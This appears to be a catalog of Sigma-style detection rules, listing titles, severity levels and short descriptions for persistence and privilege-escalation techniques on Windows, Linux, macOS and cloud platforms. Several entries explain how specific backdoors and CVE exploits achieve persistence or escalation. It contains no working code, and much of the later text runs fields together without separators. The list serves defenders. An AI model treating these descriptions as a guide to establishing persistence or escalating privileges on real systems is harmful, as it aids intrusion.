Potential Persistence Via Scrobj.dll COM Hijacking | medium | Detects use of scrobj.dll, as this DLL looks for the ScriptletURL key to get the location of the script to execute
Potential Persistence Via Visual Studio Tools for Office | medium | Detects persistence via Visual Studio Tools for Office (VSTO) add-ins in Office applications.
Suspicious Shim Database Patching Activity | high | Detects installation of new shim databases that try to patch sections of known processes for potential process injection or persistence.
Potential Persistence Via Outlook Home Page | high | Detects potential persistence activity via the Outlook home page. An attacker can set a home page to achieve code execution and persistence by editing the WebView registry keys.
Potential Persistence Via DLLPathOverride | high | Detects when an attacker adds a new "DLLPathOverride" value to the "Natural Language" key in order to achieve persistence, which will get invoked by the "SearchIndexer.exe" process
Potential Persistence Via Shim Database In Uncommon Location | high | Detects the installation of a new shim database where the file is located in a non-default location
Potential Persistence Via Shim Database Modification | medium | Adversaries may establish persistence and/or elevate privileges by executing malicious content triggered by application shims. The Microsoft Windows Application Compatibility Infrastructure/Framework (Application Shim) was created to allow for backward compatibility of software as the operating system codebase changes over time
Suspicious Powershell In Registry Run Keys | medium | Detects potential PowerShell commands or code within registry run keys
Potential SentinelOne Shell Context Menu Scan Command Tampering | medium | Detects potentially suspicious changes to the SentinelOne context menu scan command by a process other than SentinelOne.
ServiceDll Hijack | medium | Detects changes to the "ServiceDLL" value related to a service in the registry. This is often used as a method of persistence.
Persistence Via New SIP Provider | medium | Detects when an attacker registers a new SIP provider for persistence and defense evasion
Suspicious Environment Variable Has Been Registered | high | Detects the creation of user-specific or system-wide environment variables via the registry which contain suspicious commands and strings
Registry Persistence via Explorer Run Key | high | Detects a possible persistence mechanism using the RUN key for Windows Explorer and pointing to a suspicious folder
New RUN Key Pointing to Suspicious Folder | high | Detects a suspicious new RUN key element pointing to an executable in a suspicious folder
Modify User Shell Folders Startup Value | high | Detects modification of the startup key to a path where a payload could be stored to be launched during startup
Scheduled TaskCache Change by Uncommon Program | high | Monitors the creation of a new key under 'TaskCache' when a new scheduled task is registered by a process that is not svchost.exe, which is suspicious
Potential Registry Persistence Attempt Via Windows Telemetry | high | Detects potential persistence behavior using the Windows telemetry registry key. Windows telemetry makes use of the binary CompatTelRunner.exe to run a variety of commands and perform the actual telemetry collections. This binary was created to be easily extensible, and to that end, it relies on the registry to instruct it on which commands to run. The problem is that it will run any arbitrary command without restriction of location or type.
RDP Sensitive Settings Changed to Zero | medium | Detects tampering of RDP Terminal Service/Server sensitive settings, such as allowing unauthorized users access to a system via 'fAllowUnsolicited' or enabling RDP via 'fDenyTSConnections', etc.
RDP Sensitive Settings Changed | high | Detects tampering of RDP Terminal Service/Server sensitive settings, such as allowing unauthorized users access to a system via 'fAllowUnsolicited' or enabling RDP via 'fDenyTSConnections', etc.
New TimeProviders Registered With Uncommon DLL Name | high | Detects processes setting a new DLL in DllName under HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\W32Time\TimeProvider. Adversaries may abuse time providers to execute DLLs when the system boots. The Windows Time service (W32Time) enables time synchronization across and within domains.
COM Hijacking via TreatAs | medium | Detects modification of the TreatAs key to enable the "rundll32.exe -sta" command
VBScript Payload Stored in Registry | high | Detects VBScript content stored in registry keys as seen being used by the UNC2452 group
Winget Admin Settings Modification | low | Detects changes to the AppInstaller (winget) admin settings, such as enabling local manifest installations or disabling installer hash checks
Enable Local Manifest Installation With Winget | medium | Detects changes to the AppInstaller (winget) policy, specifically the activation of local manifest installation, which allows a user to install new packages via custom manifests.
Winlogon Notify Key Logon Persistence | high | Adversaries may abuse features of Winlogon to execute DLLs and/or executables when a user logs in. Winlogon.exe is a Windows component responsible for actions at logon/logoff as well as the secure attention sequence (SAS) triggered by Ctrl-Alt-Delete.
Winlogon AllowMultipleTSSessions Enable | medium | Detects when the 'AllowMultipleTSSessions' value is enabled, which allows multiple Remote Desktop connection sessions to be opened at once. This is often used by attackers as a way to connect to an RDP session without disconnecting the other users
WMI Event Subscription | medium | Detects creation of a WMI event subscription persistence method
Suspicious Encoded Scripts in a WMI Consumer | high | Detects suspicious encoded payloads in WMI Event Consumers
CosmicDuke Service Installation | critical | Detects the installation of a service named "javamtsup" on the system. The CosmicDuke info stealer uses Windows services typically named "javamtsup" for persistence.
StoneDrill Service Install | high | This method detects a service install of the malicious Microsoft Network Realtime Inspection Service described in the StoneDrill report by Kaspersky
Turla Service Install | high | This method detects a service install of malicious services mentioned in the Carbon Paper - Turla report by ESET
Turla PNG Dropper Service | critical | This method detects malicious services mentioned in the Turla PNG dropper report by NCC Group in November 2018
Oracle WebLogic Exploit | critical | Detects access to a webshell dropped into a keystore folder on the WebLogic server
OilRig APT Activity | critical | Detects OilRig activity as reported by Nyotron in their March 2018 report
OilRig APT Registry Persistence | critical | Detects OilRig registry persistence as reported by Nyotron in their March 2018 report
OilRig APT Schedule Task Persistence - Security | critical | Detects OilRig schedule task persistence as reported by Nyotron in their March 2018 report
OilRig APT Schedule Task Persistence - System | critical | Detects OilRig schedule task persistence as reported by Nyotron in their March 2018 report
Defrag DeactivationmediumDetects the deactivation and disabling of the Scheduled defragmentation task as seen by Slingshot APT group
Defrag Deactivation - SecuritymediumDetects the deactivation and disabling of the Scheduled defragmentation task as seen by Slingshot APT group
Potential Ryuk Ransomware ActivityhighDetects Ryuk ransomware activity
Suspicious PrinterPorts Creation (CVE-2020-1048)highDetects new commands that add new printer port which point to suspicious file
CVE-2020-1048 Exploitation Attempt - Suspicious New Printer Ports - RegistryhighDetects changes to the "Ports" registry key with data that includes a Windows path or a file with a suspicious extension. This could be an attempt to exploit CVE-2020-1048 - a Windows Print Spooler elevation of privilege vulnerability.
FlowCloud Registry MarkerscriticalDetects FlowCloud malware registry markers from threat group TA410. The malware stores its configuration in the registry alongside drivers utilized by the malware's keylogger components.
Leviathan Registry Key ActivitycriticalDetects registry key used by Leviathan APT in Malaysian focused campaign
Solarwinds SUPERNOVA Webshell AccesscriticalDetects access to SUPERNOVA webshell as described in Guidepoint report
Suspicious VBScript UN2452 PatternhighDetects suspicious inline VBScript keywords as used by UNC2452
Serv-U Exploitation CVE-2021-35211 by DEV-0322criticalDetects patterns as noticed in exploitation of Serv-U CVE-2021-35211 vulnerability by threat group DEV-0322
CVE-2021-40539 Zoho ManageEngine ADSelfService Plus ExploitcriticalDetects an authentication bypass vulnerability affecting the REST API URLs in ADSelfService Plus (CVE-2021-40539).
Suspicious Computer Account Name Change CVE-2021-42287highDetects the renaming of an existing computer account to a account name that doesn't contain a $ symbol as seen in attacks against CVE-2021-42287
Goofy Guineapig Backdoor Service CreationcriticalDetects service creation persistence used by the Goofy Guineapig backdoor
Moriya Rootkit File CreatedcriticalDetects the creation of a file named "MoriyaStreamWatchmen.sys" in a specific location. This filename was reported to be related to the Moriya rootkit as described in the securelist's Operation TunnelSnake report.
Pingback Backdoor File IndicatorshighDetects the use of Pingback backdoor that creates ICMP tunnel for C2 as described in the trustwave report
Pingback Backdoor DLL Loading ActivityhighDetects the use of Pingback backdoor that creates ICMP tunnel for C2 as described in the trustwave report
Pingback Backdoor ActivityhighDetects the use of Pingback backdoor that creates ICMP tunnel for C2 as described in the trustwave report
Small Sieve Malware CommandLine IndicatorhighDetects specific command line argument being passed to a binary as seen being used by the malware Small Sieve.
Small Sieve Malware Registry PersistencehighDetects registry value with specific intentional typo and strings seen used by the Small Sieve malware
HAFNIUM Exchange Exploitation ActivitycriticalDetects activity observed by different researchers to be HAFNIUM group activity (or related) on Exchange servers
SOURGUM Actor BehaviourshighSuspicious behaviours related to an actor tracked by Microsoft as SOURGUM
DEWMODE Webshell AccesshighDetects access to DEWMODE webshell as described in FIREEYE report
MSSQL Extended Stored Procedure Backdoor MaggiehighThis rule detects the execution of the extended storage procedure backdoor named Maggie in the context of Microsoft SQL server
ChromeLoader Malware ExecutionhighDetects execution of ChromeLoader malware via a registered scheduled task
Serpent Backdoor Payload Execution Via Scheduled TaskhighDetects post exploitation execution technique of the Serpent backdoor. According to Proofpoint, one of the commands that the backdoor ran was via creating a temporary scheduled task using an unusual method. It creates a fictitious windows event and a trigger in which once the event is created, it executes the payload.
Potential ACTINIUM Persistence ActivityhighDetects specific process parameters as used by ACTINIUM scheduled task persistence creation.
Outlook Task/Note Reminder ReceivedlowDetects changes to the registry values related to outlook that indicates that a reminder was triggered for a Note or Task item. This could be a sign of exploitation of CVE-2023-23397. Further investigation is required to determine the success of an exploitation.
Potential CVE-2023-27363 Exploitation - HTA File Creation By FoxitPDFReaderhighDetects suspicious ".hta" file creation in the startup folder by Foxit Reader. This can be an indication of CVE-2023-27363 exploitation.
MOVEit CVE-2023-34362 Exploitation Attempt - Potential Web Shell RequesthighDetects get requests to specific files used during the exploitation of MOVEit CVE-2023-34362
Potential CVE-2023-36884 Exploitation Dropped FilemediumDetects a specific file being created in the recent folder of Office. These files have been seen being dropped during potential exploitations of CVE-2023-36884
Potential COLDSTEEL RAT File IndicatorshighDetects the creation of a file named "dllhost.exe" in the "C:\users\public\Documents\" directory. Seen being used by the COLDSTEEL RAT in some of its variants.
Potential COLDSTEEL Persistence Service DLL CreationhighDetects the creation of a file in a specific location and with a specific name related to COLDSTEEL RAT
Potential COLDSTEEL Persistence Service DLL LoadhighDetects a suspicious DLL load by an "svchost" process based on location and name that might be related to ColdSteel RAT. This DLL location and name has been seen used by ColdSteel as the service DLL for its persistence mechanism
COLDSTEEL RAT Anonymous User Process ExecutionhighDetects the creation of a process executing as user called "ANONYMOUS" seen used by the "MileStone2016" variant of COLDSTEEL
COLDSTEEL RAT Cleanup Command ExecutioncriticalDetects the creation of a "rundll32" process from the ColdSteel persistence service to initiate the cleanup command by calling one of its own exports. This functionality is not present in "MileStone2017" and some "MileStone2016" samples
COLDSTEEL RAT Service Persistence ExecutioncriticalDetects the creation of an "svchost" process with specific command line flags, that were seen present and used by ColdSteel RAT
Potential COLDSTEEL RAT Windows User CreationhighDetects creation of a new user profile with a specific username, seen being used by some variants of the COLDSTEEL RAT.
COLDSTEEL Persistence Service CreationhighDetects the creation of new services potentially related to COLDSTEEL RAT
DarkGate - User Created Via Net.EXEhighDetects creation of local users via the net.exe command with the name of "DarkGate"
SNAKE Malware Covert Store Registry KeyhighDetects any registry event that targets the key 'SECURITY\Policy\Secrets\n' which is a key related to SNAKE malware as described by CISA
Potential Encrypted Registry Blob Related To SNAKE MalwaremediumDetects the creation of a registry value in the ".wav\OpenWithProgIds" key with an uncommon name. This could be related to SNAKE Malware as reported by CISA
SNAKE Malware Service PersistencecriticalDetects the creation of a service named "WerFaultSvc" which seems to be used by the SNAKE malware as a persistence mechanism as described by CISA in their report
Scheduled Tasks Names Used By SVR For GraphicalProton BackdoorhighHunts for known SVR-specific scheduled task names
Scheduled Tasks Names Used By SVR For GraphicalProton Backdoor - Task SchedulerhighHunts for known SVR-specific scheduled task names
Diamond Sleet APT Scheduled Task CreationcriticalDetects registry event related to the creation of a scheduled task used by Diamond Sleet APT during exploitation of Team City CVE-2023-42793 vulnerability
UNC4841 - Email Exfiltration File PatternhighDetects filename pattern of email related data used by UNC4841 for staging and exfiltration
UNC4841 - Barracuda ESG Exploitation IndicatorshighDetects file indicators as seen used by UNC4841 during their Barracuda ESG zero day exploitation.
CVE-2024-1708 - ScreenConnect Path Traversal ExploitationmediumThis detects file modifications to ASPX and ASHX files within the root of the App_Extensions directory, which is allowed by a ZipSlip vulnerability in versions prior to 23.9.8. This occurs during exploitation of CVE-2024-1708.
CVE-2024-1708 - ScreenConnect Path Traversal Exploitation - SecuritycriticalThis detects file modifications to ASPX and ASHX files within the root of the App_Extensions directory, which is allowed by a ZipSlip vulnerability in versions prior to 23.9.8. This occurs during exploitation of CVE-2024-1708. This requires an Advanced Auditing policy to log a successful Windows Event ID 4663 events and with a SACL set on the directory.
ScreenConnect User Database ModificationmediumDetects file modifications to the temporary xml user database file indicating local user modification in the ScreenConnect server. This will occur during exploitation of the ScreenConnect Authentication Bypass vulnerability (CVE-2024-1709) in versions <23.9.8, but may also be observed when making legitimate modifications to local users or permissions.
CVE-2024-1709 - ScreenConnect Authentication Bypass ExploitationcriticalDetects GET requests to '/SetupWizard.aspx/[anythinghere]' that indicate exploitation of the ScreenConnect vulnerability CVE-2024-1709.
Potential CVE-2024-3400 Exploitation - Palo Alto GlobalProtect OS Command InjectionhighDetects potential exploitation attempts of CVE-2024-3400 - an OS command injection in Palo Alto GlobalProtect. This detection looks for suspicious strings that indicate a potential directory traversal attempt or command injection.
Potential KamiKakaBot Activity - Shutdown Schedule Task CreationmediumDetects the creation of a schedule task that runs weekly and execute the "shutdown /l /f" command. This behavior was observed being used by KamiKakaBot samples in order to achieve persistence on a system.
Potential KamiKakaBot Activity - Winlogon Shell PersistencehighDetects changes to the "Winlogon" registry key where a process will set the value of the "Shell" to a value that was observed being used by KamiKakaBot samples in order to achieve persistence.
Kapeka Backdoor Persistence ActivityhighDetects Kapeka backdoor persistence activity. Depending on the process privileges, the Kapeka dropper then sets persistence for the backdoor either as a scheduled task (if admin or SYSTEM) or autorun registry (if not). For the scheduled task, it creates a scheduled task called "Sens Api" via schtasks command, which is set to run upon system startup as SYSTEM. To establish persistence through the autorun utility, it adds an autorun entry called "Sens Api" under HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run via the "reg add" command. Both persistence mechanisms are set to launch the binary by calling rundll32 and passing the backdoor's first export ordinal (#1) without any additional argument.
Kapeka Backdoor Autorun PersistencehighDetects the setting of a new value in the Autorun key that is used by the Kapeka backdoor for persistence.
Kapeka Backdoor Configuration PersistencemediumDetects registry set activity of a value called "Seed" stored in the "\Cryptography\Providers\" registry key. The Kapeka backdoor leverages this location to register a new SIP provider for backdoor configuration persistence.
Kapeka Backdoor Scheduled Task CreationhighDetects Kapeka backdoor scheduled task creation based on attributes such as paths, commands line flags, etc.
Forest Blizzard APT - Custom Protocol Handler CreationhighDetects the setting of a custom protocol handler with the name "rogue". Seen being created by Forest Blizzard APT as reported by MSFT.
Forest Blizzard APT - Custom Protocol Handler DLL Registry SethighDetects the setting of the DLL that handles the custom protocol handler. Seen being created by Forest Blizzard APT as reported by MSFT.
Authentication Occuring Outside Normal Business HourslowDetects user signs ins outside of normal business hours.
Privilege Role Sign-In Outside Of Normal HourshighDetects account sign ins outside of normal hours or uncommon locations. Administrator accounts should be investigated
Potential Remote WMI ActiveScriptEventConsumers ActivitymediumDetect potential adversaries leveraging WMI ActiveScriptEventConsumers remotely to move laterally in a network. This event is best correlated and used as an enrichment to determine the potential lateral movement activity.
Scheduled Task Created - FileCreationlowDetects the creation of a scheduled task via file creation.
Task Scheduler DLL Loaded By Application Located In Potentially Suspicious LocationlowDetects the loading of the "taskschd.dll" module from a process that located in a potentially suspicious or uncommon directory. The loading of this DLL might indicate that the application have the capability to create a scheduled task via the "Schedule.Service" COM object. Investigation of the loading application and its behavior is required to determining if its malicious.
Remote Access Tool - Ammy Admin Agent ExecutionmediumDetects the execution of the Ammy Admin RMM agent for remote management.
Remote Access Tool - Cmd.EXE Execution via AnyViewermediumDetects execution of "cmd.exe" via the AnyViewer RMM agent on a remote management sessions.
Execution From Webserver Root FoldermediumDetects a program executing from a web server root folder. Use this rule to hunt for potential interesting activity such as webshell or backdoors
Scheduled Task Created - RegistrylowDetects the creation of a scheduled task via Registry keys.
Shell Context Menu Command TamperinglowDetects changes to shell context menu commands. Use this rule to hunt for potential anomalies and suspicious shell commands.
Silence.Downloader V3highDetects Silence downloader. These commands are hardcoded into the binary.
Files Dropped to Program Files by Non-Priviledged ProcessmediumSearch for dropping of files to Windows/Program Files fodlers by non-priviledged processes
Malicious Service InstallationscriticalDetects known malicious service installs that only appear in cases of lateral movement, credential dumping, and other suspicious activities.
Remote Schtasks CreationmediumDetects remote execution via scheduled task creation or update on the destination host
Rare Schtasks CreationslowDetects rare scheduled tasks creations that only appear a few times per time frame and could reveal password dumpers, backdoor installs or other types of malicious code
Failed Logins with Different Accounts from Single Source SystemmediumDetects suspicious failed logins with different user accounts from a single source system
Failed NTLM Logins with Different Accounts from Single Source SystemmediumDetects suspicious failed logins with different user accounts from a single source system
Rare Service InstallationslowDetects rare service installs that only appear a few times per time frame and could reveal password dumpers, backdoor installs or other types of malicious services
Rare Scheduled Task CreationslowThis rule detects rare scheduled task creations. Typically software gets installed on multiple systems and not only on a few. The aggregation and count function selects tasks with rare names.
attack.privilege_escalation 421
Title Level Description
App Permissions Granted For Other APIsmediumDetects when app permissions (app roles) for other APIs are granted
OMIGOD SCX RunAsProvider ExecuteShellCommand - AuditdhighRule to detect the use of the SCX RunAsProvider Invoke_ExecuteShellCommand to execute any UNIX/Linux command using the /bin/sh shell. SCXcore, started as the Microsoft Operations Manager UNIX/Linux Agent, is now used in a host of products including Microsoft Operations Manager. Microsoft Azure, and Microsoft Operations Management Suite.
User Added To Admin Group - MacOSmediumDetects attempts to create and/or add an account to the admin group, thus granting admin privileges.
Usage Of Malicious POORTRY Signed DriverhighDetects the load of the signed poortry driver used by UNC3944 as reported by Mandiant and Sentinel One.
Vulnerable AVAST Anti Rootkit Driver LoadhighDetects the load of a signed and vulnerable AVAST Anti Rootkit driver often used by threat actors or malware for stopping and disabling AV and EDR products
Vulnerable Dell BIOS Update Driver LoadhighDetects the load of the vulnerable Dell BIOS update driver as reported in CVE-2021-21551
Vulnerable Driver Load By NamelowDetects the load of known vulnerable drivers via their names only.
Vulnerable GIGABYTE Driver LoadhighDetects the load of a signed and vulnerable GIGABYTE driver often used by threat actors or malware for privilege escalation
Vulnerable HW Driver LoadhighDetects the load of a legitimate signed driver named HW.sys by often used by threat actors or malware for privilege escalation
Vulnerable Lenovo Driver LoadhighDetects the load of the vulnerable Lenovo driver as reported in CVE-2022-3699 which can be used to escalate privileges
SCM DLL SideloadmediumDetects DLL sideloading of DLLs that are loaded by the SCM for some services (IKE, IKEEXT, SessionEnv) which do not exists on a typical modern system
PrintNightmare Powershell ExploitationhighDetects Commandlet name for PrintNightmare exploitation.
Suspicious In-Memory Module ExecutionlowDetects the access to processes by other suspicious processes which have reflectively loaded libraries in their memory space. An example is SilentTrinity C2 behaviour. Generally speaking, when Sysmon EventID 10 cannot reference a stack call to a dll loaded from disk (the standard way), it will display "UNKNOWN" as the module name. Usually this means the stack call points to a module that was reflectively loaded in memory. Adding to this, it is not common to see such few calls in the stack (ntdll.dll --> kernelbase.dll --> unknown) which essentially means that most of the functions required by the process to execute certain routines are already present in memory, not requiring any calls to external libraries. The latter should also be considered suspicious.
Hurricane Panda ActivityhighDetects Hurricane Panda Activity
New Service CreationlowDetects creation of a new service.
Run Whoami as SYSTEMhighDetects a whoami.exe executed by LOCAL SYSTEM. This may be a sign of a successful local privilege escalation.
Kubernetes CronJob/Job ModificationmediumDetects when a Kubernetes CronJob or Job is created or modified. A Kubernetes Job creates one or more pods to accomplish a specific task, and a CronJob creates Jobs on a recurring schedule. An adversary can take advantage of this Kubernetes object to schedule Jobs to run containers that execute malicious code within a cluster, allowing them to achieve persistence.
Kubernetes Rolebinding ModificationmediumDetects when a Kubernetes Rolebinding is created or modified.
Kubernetes Unauthorized or Unauthenticated AccesslowDetects when a request to the Kubernetes API is rejected due to lack of authorization or due to an expired authentication token being used. This may indicate an attacker attempting to leverage credentials they have obtained.
Suspicious SQL QuerymediumDetects suspicious SQL query keywrods that are often used during recon, exfiltration or destructive activities. Such as dropping tables and selecting wildcard fields
AWS Attached Malicious Lambda LayermediumDetects when an user attached a Lambda layer to an existing function to override a library that is in use by the function, where their malicious code could utilize the function's IAM role for AWS API calls. This would give an adversary access to the privileges associated with the Lambda service role that is attached to that function.
Malicious Usage Of IMDS Credentials Outside Of AWS InfrastructurehighDetects when an instance identity has taken an action that isn't inside SSM. This can indicate that a compromised EC2 instance is being used as a pivot point.
Potential Malicious Usage of CloudTrail System ManagerhighDetect when System Manager successfully executes commands against an instance.
AWS SAML Provider Deletion ActivitymediumDetects the deletion of an AWS SAML provider, potentially indicating malicious intent to disrupt administrative or security team access. An attacker can remove the SAML provider for the information security team or a team of system administrators, to make it difficult for them to work and investigate at the time of the attack and after it.
AWS Key Pair Import ActivitymediumDetects the import of SSH key pairs into AWS EC2, which may indicate an attacker attempting to gain unauthorized access to instances. This activity could lead to initial access, persistence, or privilege escalation, potentially compromising sensitive data and operations.
New AWS Lambda Function URL Configuration CreatedmediumDetects when a user creates a Lambda function URL configuration, which could be used to expose the function to the internet and potentially allow unauthorized access to the function's IAM role for AWS API calls. This could give an adversary access to the privileges associated with the Lambda service role that is attached to that function.
AWS Glue Development Endpoint ActivitylowDetects possible suspicious glue development endpoint activity.
AWS Root CredentialsmediumDetects AWS root account usage
AWS STS AssumeRole MisuselowIdentifies the suspicious use of AssumeRole. Attackers could move laterally and escalate privileges.
AWS STS GetSessionToken MisuselowIdentifies the suspicious use of GetSessionToken. Tokens could be created and used by attackers to move laterally and escalate privileges.
AWS Suspicious SAML ActivitymediumIdentifies when suspicious SAML activity has occurred in AWS. An adversary could gain backdoor access via SAML.
User Added to an Administrator's Azure AD RolemediumUser Added to an Administrator's Azure AD Role
Azure Kubernetes CronJobmediumIdentifies when a Azure Kubernetes CronJob runs in Azure Cloud. Kubernetes Job is a controller that creates one or more pods and ensures that a specified number of them successfully terminate. Kubernetes Job can be used to run containers that perform finite tasks for batch jobs. Kubernetes CronJob is used to schedule Jobs. An Adversary may use Kubernetes CronJob for scheduling execution of malicious code that would run as a container in the cluster.
Certificate-Based Authentication EnabledmediumDetects when certificate based authentication has been enabled in an Azure Active Directory tenant.
Changes to Device Registration PolicyhighMonitor and alert for changes to the device registration policy.
New Root Certificate Authority AddedmediumDetects newly added root certificate authority to an AzureAD tenant to support certificate based authentication.
Users Added to Global or Device Admin RoleshighMonitor and alert for users added to device admin roles.
Application AppID Uri Configuration ChangeshighDetects when a configuration change is made to an applications AppID URI.
App Granted Privileged Delegated Or App PermissionshighDetects when administrator grants either application permissions (app roles) or highly privileged delegated permissions
App Assigned To Azure RBAC/Microsoft Entra RolemediumDetects when an app is assigned Azure AD roles, such as global administrator, or Azure RBAC roles, such as subscription owner.
Application URI Configuration ChangeshighDetects when a configuration change is made to an applications URI. URIs for domain names that no longer exist (dangling URIs), not using HTTPS, wildcards at the end of the domain, URIs that are no unique to that app, or URIs that point to domains you do not control should be investigated.
User State Changed From Guest To MembermediumDetects the change of user type from "Guest" to "Member" for potential elevation of privilege.
PIM Approvals And Deny ElevationhighDetects when a PIM elevation is approved or denied. Outside of normal operations should be investigated.
PIM Alert Setting Changes To DisabledhighDetects when PIM alerts are set to disabled.
Changes To PIM SettingshighDetects when changes are made to PIM roles
User Added To Privilege RolehighDetects when a user is added to a privileged role.
Privileged Account CreationmediumDetects when a new admin is created.
Activity From Anonymous IP AddresshighIdentifies that users were active from an IP address that has been identified as an anonymous proxy IP address.
Atypical TravelhighIdentifies two sign-ins originating from geographically distant locations, where at least one of the locations may also be atypical for the user, given past behavior.
Impossible TravelhighIdentifies user activities originating from geographically distant locations within a time period shorter than the time it takes to travel from the first location to the second.
Suspicious Browser ActivityhighIndicates anomalous behavior based on suspicious sign-in activity across multiple tenants from different countries in the same browser
Azure AD Threat IntelligencehighIndicates user activity that is unusual for the user or consistent with known attack patterns.
New CountryhighDetects sign-ins from new countries. The detection considers past activity locations to determine new and infrequent locations.
Unfamiliar Sign-In PropertieshighDetects sign-in with properties that are unfamiliar to the user. The detection considers past sign-in history to look for anomalous sign-ins.
Stale Accounts In A Privileged RolehighIdentifies when an account hasn't signed in during the past n number of days.
Invalid PIM LicensehighIdentifies when an organization doesn't have the proper license for PIM and is out of compliance.
Roles Assigned Outside PIMhighIdentifies when a privilege role assignment has taken place outside of PIM and may indicate an attack.
Roles Activation Doesn't Require MFAhighIdentifies when a privilege role can be activated without performing mfa.
Roles Activated Too FrequentlyhighIdentifies when the same privilege role has multiple activations by the same user.
Roles Are Not Being UsedhighIdentifies when a user has been assigned a privilege role and are not using that role.
Too Many Global AdminshighIdentifies an event where there are there are too many accounts assigned the Global Administrator role.
Application Using Device Code Authentication FlowmediumDevice code flow is an OAuth 2.0 protocol flow specifically for input constrained devices and is not used in all environments. If this type of flow is seen in the environment and not being used in an input constrained device scenario, further investigation is warranted. This can be a misconfigured application or potentially something malicious.
Applications That Are Using ROPC Authentication FlowmediumResource owner password credentials (ROPC) should be avoided if at all possible as this requires the user to expose their current password credentials to the application directly. The application then uses those credentials to authenticate the user against the identity provider.
Bitbucket Global Permission ChangedmediumDetects global permissions change activity.
GCP Access Policy DeletedmediumDetects when an access policy that is applied to a GCP cloud resource is deleted. An adversary would be able to remove access policies to gain access to a GCP cloud resource.
Google Cloud Kubernetes CronJobmediumIdentifies when a Google Cloud Kubernetes CronJob runs in Azure Cloud. Kubernetes Job is a controller that creates one or more pods and ensures that a specified number of them successfully terminate. Kubernetes Job can be used to run containers that perform finite tasks for batch jobs. Kubernetes CronJob is used to schedule Jobs. An Adversary may use Kubernetes CronJob for scheduling execution of malicious code that would run as a container in the cluster.
Google Workspace Application Access Level ModifiedmediumDetects when an access level is changed for a Google workspace application. An access level is part of BeyondCorp Enterprise which is Google Workspace's way of enforcing Zero Trust model. An adversary would be able to remove access levels to gain easier access to Google workspace resources.
Github New Secret CreatedlowDetects when a user creates action secret for the organization, environment, codespaces or repository.
Github Self Hosted Runner Changes DetectedlowA self-hosted runner is a system that you deploy and manage to execute jobs from GitHub Actions on GitHub.com. This rule detects changes to self-hosted runners configurations in the environment. The self-hosted runner configuration changes once detected, it should be validated from GitHub UI because the log entry may not provide full context.
Github SSH Certificate Configuration ChangedmediumDetects when changes are made to the SSH certificate configuration of the organization.
Linux Capabilities DiscoverylowDetects attempts to discover the files with setuid/setgid capability on them. That would allow adversary to escalate their privileges.
Possible Coin Miner CPU Priority ParamcriticalDetects command line parameter very often used with coin miners
Loading of Kernel Module via InsmodhighDetects loading of kernel modules with insmod command. Loadable Kernel Modules (LKMs) are pieces of code that can be loaded and unloaded into the kernel upon demand. Adversaries may use LKMs to obtain persistence within the system or elevate the privileges.
Buffer Overflow AttemptshighDetects buffer overflow attempts in Unix system log files
Code Injection by ld.so PreloadhighDetects the ld.so preload persistence file. See `man ld.so` for more information.
Nimbuspwn ExploitationhighDetects exploitation of Nimbuspwn privilege escalation vulnerability (CVE-2022-29799 and CVE-2022-29800)
PwnKit Local Privilege EscalationhighDetects potential PwnKit exploitation CVE-2021-4034 in auth logs
Sudo Privilege Escalation CVE-2019-14287 - BuiltincriticalDetects users trying to exploit sudo vulnerability reported in CVE-2019-14287
Linux Doas Conf File CreationmediumDetects the creation of the doas.conf file on a Linux host.
Linux Doas Tool ExecutionlowDetects execution of the doas tool on a Linux host. This utility allows standard users to perform tasks as root, the same way sudo does.
OMIGOD SCX RunAsProvider ExecuteScripthighRule to detect the use of the SCX RunAsProvider ExecuteScript to execute any UNIX/Linux script using the /bin/sh shell. The script being executed is created as a temp file in the /tmp folder with an scx* prefix. Then it is invoked from the following directory: /etc/opt/microsoft/scx/conf/tmpdir/. The file in that directory has the same scx* prefix. SCXcore, started as the Microsoft Operations Manager UNIX/Linux Agent, is now used in a host of products including Microsoft Operations Manager, Microsoft Azure, and Microsoft Operations Management Suite.
OMIGOD SCX RunAsProvider ExecuteShellCommandhighRule to detect the use of the SCX RunAsProvider Invoke_ExecuteShellCommand to execute any UNIX/Linux command using the /bin/sh shell. SCXcore, started as the Microsoft Operations Manager UNIX/Linux Agent, is now used in a host of products including Microsoft Operations Manager, Microsoft Azure, and Microsoft Operations Management Suite.
Scheduled Cron Task/Job - LinuxmediumDetects abuse of the cron utility to perform task scheduling for initial or recurring execution of malicious code. Detection will focus on crontab jobs uploaded from the tmp folder.
Sudo Privilege Escalation CVE-2019-14287highDetects users trying to exploit sudo vulnerability reported in CVE-2019-14287
Triple Cross eBPF Rootkit Execve HijackhighDetects execution of the file "execve_hijack" which is used by the Triple Cross rootkit as a way to elevate privileges
User Added To Root/Sudoers Group Using UsermodmediumDetects usage of the "usermod" binary to add users to the root or sudoers groups
MacOS Emond Launch DaemonmediumDetects additions to the Emond Launch Daemon that adversaries may use to gain persistence and elevate privileges.
Startup Item File Created - MacOSlowDetects the creation of a startup item plist file that automatically gets executed at boot initialization to establish persistence. Adversaries may use startup items automatically executed at boot initialization to establish persistence. Startup items execute during the final phase of the boot process and contain shell scripts or other executable files along with configuration information used by the system to determine the execution order for all startup items.
User Added To Admin Group Via DsclmediumDetects attempts to create and add an account to the admin group via "dscl"
User Added To Admin Group Via DseditGroupmediumDetects attempts to create and/or add an account to the admin group, thus granting admin privileges.
Scheduled Cron Task/Job - MacOsmediumDetects abuse of the cron utility to perform task scheduling for initial or recurring execution of malicious code. Detection will focus on crontab jobs uploaded from the tmp folder.
User Added To Admin Group Via SysadminctlmediumDetects attempts to create and add an account to the admin group via "sysadminctl"
Cisco BGP Authentication FailureslowDetects BGP failures which may be indicative of brute force attacks to manipulate routing
Cisco LDP Authentication FailureslowDetects LDP failures which may be indicative of brute force attacks to manipulate MPLS labels
Huawei BGP Authentication FailureslowDetects BGP failures which may be indicative of brute force attacks to manipulate routing.
Juniper BGP Missing MD5lowDetects Juniper BGP sessions missing an MD5 digest, which may be indicative of brute force attacks to manipulate routing.
OMIGOD HTTP No Authentication RCEhighDetects the exploitation of OMIGOD (CVE-2021-38647) which allows remote code execution (RCE) as root with just a single unauthenticated HTTP request. Verify successful exploitation by viewing the HTTP client (request) body to see what was passed to the server (using PCAP). Within the client body is where the code execution would occur. Additionally, check the endpoint logs to see if suspicious commands or activity occurred within the timeframe of this HTTP request.
Audit CVE EventcriticalDetects events generated by user-mode applications when they call the CveEventWrite API while a known vulnerability is being exploited. MS started using this log in Jan. 2020 with CVE-2020-0601 (a Windows CryptoAPI vulnerability). Unfortunately, that is about the only instance of CVEs being written to this log.
